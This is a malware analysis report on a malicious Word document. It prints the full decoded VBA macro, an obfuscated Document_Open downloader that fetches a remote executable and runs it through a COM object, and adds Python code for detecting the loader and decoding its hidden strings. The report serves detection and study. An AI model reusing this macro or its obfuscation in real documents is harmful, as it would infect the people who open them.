Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 801e62ddcd256f1a…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 36.5 KB
Created: 2019-01-24 12:48:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31

MD5: 426ecb165a3386e2f319b2327a2f5a53
SHA-1: 6cd0bef592f5b08a7766fc25250a0346020783bd
SHA-256: 801e62ddcd256f1aca61520881c30a006930914cd908bb732c60c837c814990d
360 Risk Score

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1059 Command and Scripting Interpreter
  • T1071.001 Application Layer Protocol: Web Protocols

The sample contains obfuscated VBA macros that run automatically when the document is opened (Document_Open). No operational string appears in clear text in the macro: the download URL and the drop-file name are hidden inside filler text and recovered at run time by a character-skipping decoder (dyVR7), while the environment-variable name and the COM ProgID are stored as hex and decrypted with an RC4-style keystream routine (MCk5jNez). The macro then calls URLDownloadToFileA to fetch a second-stage payload to a path built from an environment variable, instantiates a COM object with CreateObject, and launches the downloaded file through that object's Run method. This is downloader/dropper functionality; the document itself carries no final payload, only the loader.

Heuristics (11)

  • ClamAV: Doc.Malware.Chronos-6897935-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • Reference to URLDownloadToFile API (critical) SC_STR_URLDOWNLOAD
    The URLMON download API URLDownloadToFile is referenced; here it is imported through a Declare statement in the macro.
  • VBA macros detected (medium, 6 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA (critical) OLE_VBA_DOWNLOAD
    Matched lines in script:
    Attribute VB_Customizable = True
    Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
    Sub Document_Open()
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    An auto-exec VBA routine reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source, so plain string signatures on the source miss them.
    Matched lines in script:
    hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
    Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
    p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    Matched lines in script:
    hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
    Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
    p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where the visible source is unavailable (or, with VBA stomping, does not match the p-code that actually runs).
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Matched lines in script:
    Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
    Sub Document_Open()
    Hz9nTLRgw
  • Environ() call, environment-variable access (low) OLE_VBA_ENVIRON
    Matched lines in script:
    Dim p3lzLi85AKeDJ3Fx
    dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc")
    P6OcuF = dyVR7("h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC")
  • Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, labelled "Referenced by macro". This is the standard Office DrawingML schema namespace; it does not occur in the decoded macro source below and is not an indicator.
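The loader shape described by OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER, and the name-mangling ratio reported for macros.bas in the artifact section, can be reproduced with a small static pass over olevba output. The following is an added example for this report, not code from the analysis platform or from oletools. It applies auto-exec, sink and decoder-marker checks to an excerpt copied from the extracted macros.bas shown later on this page (the RC4 loops and the URL blob are left out of the excerpt) and to a constructed benign Document_Open macro as a control. Rule IDs that appear in the report are reused for readability; OLE_VBA_RUN_SINK, OLE_VBA_NAME_MANGLING, the decoder-marker list and every threshold are this example's own choices.

```python
"""Static triage of VBA source for the obfuscated auto-exec loader shape.

Added example for this report (not oletools code, not the platform's rules).
MACRO_EXCERPT is copied from the extracted macros.bas; BENIGN_VBA is a
constructed control. Thresholds and the extra rule IDs are illustrative.
"""
import re

AUTOEXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
    r"(?:Document_Open|AutoOpen|Auto_Open|AutoExec|Workbook_Open|Document_Close|AutoClose)\b",
    re.I | re.M)
SINKS = {
    "OLE_VBA_DOWNLOAD": re.compile(r"\bURLDownloadToFile", re.I),
    "OLE_VBA_CREATEOBJ": re.compile(r"\bCreateObject\s*\(", re.I),
    "OLE_VBA_RUN_SINK": re.compile(r"\.\s*Run\b|\bShell\s*\(", re.I),   # illustrative ID
    "OLE_VBA_ENVIRON": re.compile(r"\bEnviron\s*\(", re.I),
}
# Building blocks of hand-rolled string decoders (hex/Chr rebuild, XOR, byte juggling).
DECODER_MARKERS = [re.compile(p, re.I) for p in (
    r"\bChr\$?\s*\(", r"\bVal\s*\(", r"\bMid\$?\s*\(", r"\bAsc\s*\(",
    r"\bXor\b", r"\bStrConv\s*\(", r"\bReplace\s*\(")]
IDENT = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]{5,}\b")   # only names of 6+ chars are judged


def strip_literals(src: str) -> str:
    """Drop string literals and ' comments so filler text is not counted as identifiers."""
    src = re.sub(r'"[^"\n]*"', '""', src)
    return re.sub(r"'[^\n]*", "", src)


def looks_mangled(name: str) -> bool:
    """Random-looking if the case/digit class flips often; a camelCase word start (Upper after lower) is not a flip."""
    def cls(c):
        return "U" if c.isupper() else "L" if c.islower() else "D" if c.isdigit() else "_"
    flips = sum(1 for a, b in zip(name, name[1:])
                if cls(a) != cls(b) and not (cls(a) == "U" and cls(b) == "L"))
    return flips >= 3 and flips / len(name) >= 0.3


def triage(vba_source: str) -> dict:
    code = strip_literals(vba_source)
    findings = set()
    if AUTOEXEC.search(code):
        findings.add("OLE_VBA_DOCOPEN")
    for rule, pat in SINKS.items():
        if pat.search(code):
            findings.add(rule)
    idents = sorted(set(IDENT.findall(code)))
    mangled = [i for i in idents if looks_mangled(i)]
    ratio = len(mangled) / len(idents) if idents else 0.0
    if ratio >= 0.3:
        findings.add("OLE_VBA_NAME_MANGLING")                       # illustrative ID
    decoder_hits = sum(1 for p in DECODER_MARKERS if p.search(code))
    # Composite loader shape: auto-exec + custom decoder + instantiation/execution sink.
    if ("OLE_VBA_DOCOPEN" in findings and decoder_hits >= 3
            and findings & {"OLE_VBA_CREATEOBJ", "OLE_VBA_RUN_SINK"}):
        findings.add("OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER")
    return {"findings": sorted(findings), "mangled_identifiers": mangled,
            "mangled_ratio": round(ratio, 2), "decoder_markers": decoder_hits}


# Copied from the extracted macros.bas (RC4 loops and the URL blob omitted).
MACRO_EXCERPT = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
Sub Document_Open()
Hz9nTLRgw
End Sub
Sub Hz9nTLRgw()
Dim P6OcuF
Dim hGxsDgQQfRCA4d
Dim dpXyOdLN5Xk7rX
Dim p3lzLi85AKeDJ3Fx
dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc")
hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
End Sub
Private Function MCk5jNez(l6iMNaGqPG As String, KLvOqFHtiFY As String) As String
        prk1kspXxT8zeTE = Chr$(Val(b9UY4DO("&", "H") & Mid$(l6iMNaGqPG, UbS12KlpsKiGj0K, 2)))
      MCk5jNez = MCk5jNez & Chr$((vs8i4ov(lTkmM((CLng(lTkmM(OmzSlVcPoG)) + lTkmM(hl5KQR6YxTYF2zdV)) Mod 256), Asc(Mid$(l6iMNaGqPG, OmzSlVcPoGdx, 1)))))
End Function
Private Function vs8i4ov(ByVal OmzSlVcPoG As Long, ByVal hl5KQR6YxTYF2zdV As Long) As Long
      vs8i4ov = OmzSlVcPoG Xor hl5KQR6YxTYF2zdV
End Function
'''

# Constructed control: an auto-exec macro with no decoder and no execution sink.
BENIGN_VBA = '''
Sub Document_Open()
    ' constructed benign control
    ActiveDocument.Range.InsertAfter "Reviewed " & Format(Now, "yyyy-mm-dd")
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample excerpt", MACRO_EXCERPT), ("benign control", BENIGN_VBA)):
        print(label, triage(src))
```

In practice the source comes from olevba (oletools) or from the carved macros.bas in the artifact section. The name heuristic judges identifiers only, after string literals and comments are removed, so filler inside the dyVR7 blobs is not counted. The benign control still raises OLE_VBA_DOCOPEN on its own, which is why that rule is rated low above and the composite rule additionally requires decoder markers and a sink before it fires.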

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4674 bytes
SHA-256: 8161f102046c7caf14d3f29e4c90e7d20c6a1fb79708521ce492dd2a802828b9

Detection
ClamAV: No threats found (the ClamAV detection above is on the document itself, not on this carved source)
Obfuscation or payload: likely
45 of 88 identifiers look randomly generated (e.g. 'JMftNOuWtfOh9pi8W_smt'), consistent with name-mangling obfuscation. Note that the quoted token is in fact a substring of the dyVR7 string literal that encodes the download URL, so this count also includes filler from string contents, not only declared names.

Preview script (first 1,000 lines of the extracted script; the macro is shorter than that, so it is shown in full)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
Sub Document_Open()
Hz9nTLRgw
End Sub
Sub Hz9nTLRgw()
Dim P6OcuF
Dim hGxsDgQQfRCA4d
Dim dpXyOdLN5Xk7rX
Dim p3lzLi85AKeDJ3Fx
dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc")
P6OcuF = dyVR7("h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC")
hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
End Sub

Private Function MCk5jNez(l6iMNaGqPG As String, KLvOqFHtiFY As String) As String
On Error Resume Next
    Dim lTkmM(0 To 255) As Byte
    Dim GNwtrKSYY(0 To 255) As Byte
    Dim tb9O4HuUkNekQ1Jqah     As Byte
    Dim OmzSlVcPoG      As Long
    Dim hl5KQR6YxTYF2zdV      As Long
    Dim OmzSlVcPoGdx      As Long
    Dim prk1kspXxT8zeTE As String
    Dim zwZuFXIj As String
    Dim UbS12KlpsKiGj0K As Long
    
    For UbS12KlpsKiGj0K = 1 To Len(l6iMNaGqPG) Step 2
        prk1kspXxT8zeTE = Chr$(Val(b9UY4DO("&", "H") & Mid$(l6iMNaGqPG, UbS12KlpsKiGj0K, 2)))
        zwZuFXIj = zwZuFXIj & prk1kspXxT8zeTE
    Next UbS12KlpsKiGj0K
    
    l6iMNaGqPG = zwZuFXIj

    For OmzSlVcPoGdx = 0 To 255
      lTkmM(OmzSlVcPoGdx) = OmzSlVcPoGdx
      GNwtrKSYY(OmzSlVcPoGdx) = Asc(Mid$(KLvOqFHtiFY, 1 + (OmzSlVcPoGdx Mod Len(KLvOqFHtiFY)), 1))
    Next
    For OmzSlVcPoG = 0 To 255
      hl5KQR6YxTYF2zdV = (hl5KQR6YxTYF2zdV + lTkmM(OmzSlVcPoG) + GNwtrKSYY(OmzSlVcPoG)) Mod 256
      tb9O4HuUkNekQ1Jqah = lTkmM(OmzSlVcPoG)
      lTkmM(OmzSlVcPoG) = lTkmM(hl5KQR6YxTYF2zdV)
      lTkmM(hl5KQR6YxTYF2zdV) = tb9O4HuUkNekQ1Jqah
    Next
    OmzSlVcPoG = 0
    hl5KQR6YxTYF2zdV = 0
    For OmzSlVcPoGdx = 1 To Len(l6iMNaGqPG)
      OmzSlVcPoG = (OmzSlVcPoG + 1) Mod 256
      hl5KQR6YxTYF2zdV = (hl5KQR6YxTYF2zdV + lTkmM(OmzSlVcPoG)) Mod 256
      tb9O4HuUkNekQ1Jqah = lTkmM(OmzSlVcPoG)
      lTkmM(OmzSlVcPoG) = lTkmM(hl5KQR6YxTYF2zdV)
      lTkmM(hl5KQR6YxTYF2zdV) = tb9O4HuUkNekQ1Jqah
      MCk5jNez = MCk5jNez & Chr$((vs8i4ov(lTkmM((CLng(lTkmM(OmzSlVcPoG)) + lTkmM(hl5KQR6YxTYF2zdV)) Mod 256), Asc(Mid$(l6iMNaGqPG, OmzSlVcPoGdx, 1)))))
    Next
End Function
Private Function vs8i4ov(ByVal OmzSlVcPoG As Long, ByVal hl5KQR6YxTYF2zdV As Long) As Long
On Error Resume Next
    If OmzSlVcPoG = hl5KQR6YxTYF2zdV Then
      vs8i4ov = hl5KQR6YxTYF2zdV
    Else
      vs8i4ov = OmzSlVcPoG Xor hl5KQR6YxTYF2zdV
    End If
End Function

Function eXbnDKMvOhj(Hfr9620sTYhaxpLYEo As String, bjNjfg5VkxuB3Ws3A6 As String)
eXbnDKMvOhj = Hfr9620sTYhaxpLYEo + bjNjfg5VkxuB3Ws3A6
End Function
Function PDOCte(KaZnFX As String, rhpiC8f As String)
PDOCte = KaZnFX + rhpiC8f
End Function
Function FWjFM37eg(kAtwCT0WGuYNe45mB As String, MH1w8BVoNf2 As String)
FWjFM37eg = kAtwCT0WGuYNe45mB + MH1w8BVoNf2
End Function
Function rSdI2XFZR8T(lVCli9DueJ4JtgAV As String, c3Wk2BZjEklgedrE9 As String)
rSdI2XFZR8T = lVCli9DueJ4JtgAV + c3Wk2BZjEklgedrE9
End Function
Function jES4Wyj0(rRINcxXRADh2S000l As String, V1iKd2TPSDzgD5 As String)
jES4Wyj0 = rRINcxXRADh2S000l + V1iKd2TPSDzgD5
End Function
Function Fg2oaYYH(sI4UFQYCb0L1BHkg As String, sEi75WnGtDVKRU As String)
Fg2oaYYH = sI4UFQYCb0L1BHkg + sEi75WnGtDVKRU
End Function
Function b9UY4DO(cIahv As String, VCwo6JI0I7hW As String)
b9UY4DO = cIahv + VCwo6JI0I7hW
End Function
Function dyVR7(oyMcmlHEMD As String) As String
    Dim YwfEtoOry0(1055) As Byte
    Dim Jkq3Y1LFGMVu8N9() As Byte
    Dim nzFwEZgadUlgCb32
    Dim S51G9FNk4y31Wr
    Jkq3Y1LFGMVu8N9 = StrConv(oyMcmlHEMD, vbFromUnicode)
    For S51G9FNk4y31Wr = 0 To UBound(Jkq3Y1LFGMVu8N9) - 1
        If (S51G9FNk4y31Wr Mod 5 = 0) Then
            YwfEtoOry0(nzFwEZgadUlgCb32) = Jkq3Y1LFGMVu8N9(S51G9FNk4y31Wr)
            nzFwEZgadUlgCb32 = nzFwEZgadUlgCb32 + 1
        End If
    Next S51G9FNk4y31Wr
    dyVR7 = Left(StrConv(YwfEtoOry0, vbUnicode), nzFwEZgadUlgCb32)
End Function
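The two decoders above are small enough to re-implement, which is the check a practitioner wants before trusting the summary: run the macro's own transforms offline and read the arguments that reach URLDownloadToFileA, Environ and CreateObject. The following is an added example for this report; it is not part of the sample and not an analysis-tool feature. skip_decode mirrors dyVR7 (keep every 5th byte; the VBA loop runs to UBound-1, so the final byte is never examined), and hex_rc4_decode mirrors MCk5jNez together with vs8i4ov (hex-decode, then RC4, with the quirk that a ciphertext byte equal to its keystream byte is passed through instead of XORing to NUL). The blobs, hex strings and keys are copied from Hz9nTLRgw; the helpers FWjFM37eg, rSdI2XFZR8T, jES4Wyj0, Fg2oaYYH and b9UY4DO in the macro only concatenate their two arguments, which is done inline here.

```python
"""Offline re-implementation of the string decoders in the extracted macros.bas.

Added example for this report, not code from the sample or from any tool.
Inputs below are copied from the macro; the decoders mirror dyVR7 and
MCk5jNez/vs8i4ov so the loader's run-time strings can be read without
opening the document.
"""


def skip_decode(blob: str, stride: int = 5) -> str:
    """dyVR7: the real characters sit at indices 0, 5, 10, ...; everything else is filler."""
    data = blob.encode("latin-1")            # StrConv(..., vbFromUnicode) on ASCII input
    # VBA: For i = 0 To UBound(bytes) - 1, so the last byte is never looked at.
    keep = bytes(data[i] for i in range(0, len(data) - 1) if i % stride == 0)
    return keep.decode("latin-1")


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 KSA + PRGA, as written in the macro's two 0..255 loops."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def hex_rc4_decode(hex_cipher: str, key: str) -> str:
    """MCk5jNez: ASCII hex -> bytes -> RC4. vs8i4ov returns the ciphertext byte
    unchanged when it equals the keystream byte (avoids emitting Chr$(0))."""
    cipher = bytes.fromhex(hex_cipher)
    stream = rc4_keystream(key.encode("latin-1"), len(cipher))
    plain = bytes(c if c == k else c ^ k for c, k in zip(cipher, stream))
    return plain.decode("latin-1")


# Constants copied from Sub Hz9nTLRgw in the extracted macro.
URL_BLOB = r"h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC"
PATH_BLOB = r"\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc"
ENV_HEX, ENV_KEY = "66C1" + "24BE", "vw" + "oV0"                              # FWjFM37eg / rSdI2XFZR8T
PROGID_HEX, PROGID_KEY = "DE57632A0E4D6" + "55CEED9673E98", "p8e" + "nM9P"    # jES4Wyj0 / Fg2oaYYH


def recover_indicators() -> dict:
    """The four run-time strings, computed exactly as the macro computes them."""
    return {
        "download_url": skip_decode(URL_BLOB),            # 2nd argument of URLDownloadToFileA
        "drop_path_suffix": skip_decode(PATH_BLOB),       # appended to Environ(...)
        "environ_variable": hex_rc4_decode(ENV_HEX, ENV_KEY),
        "com_progid": hex_rc4_decode(PROGID_HEX, PROGID_KEY),
    }


if __name__ == "__main__":
    for name, value in recover_indicators().items():
        print(f"{name}: {value!r}")
```

Running the skip decoder over the two blobs yields the download URL hxxps://verservices[.]com/img/akck3.exe (defanged here; treat it as an indicator from this sample) and the drop-file suffix \tgnyuq.exe. The RC4 routine yields a 4-character environment-variable name and a 13-character ProgID; those lengths match TEMP and WScript.Shell, which the .Run call on the created object also fits, but that is an assumption until the decoder is run rather than something the report states. Note that plain string matching on the macro source for "&H" would miss this sample, because even that prefix is assembled at run time by b9UY4DO("&", "H").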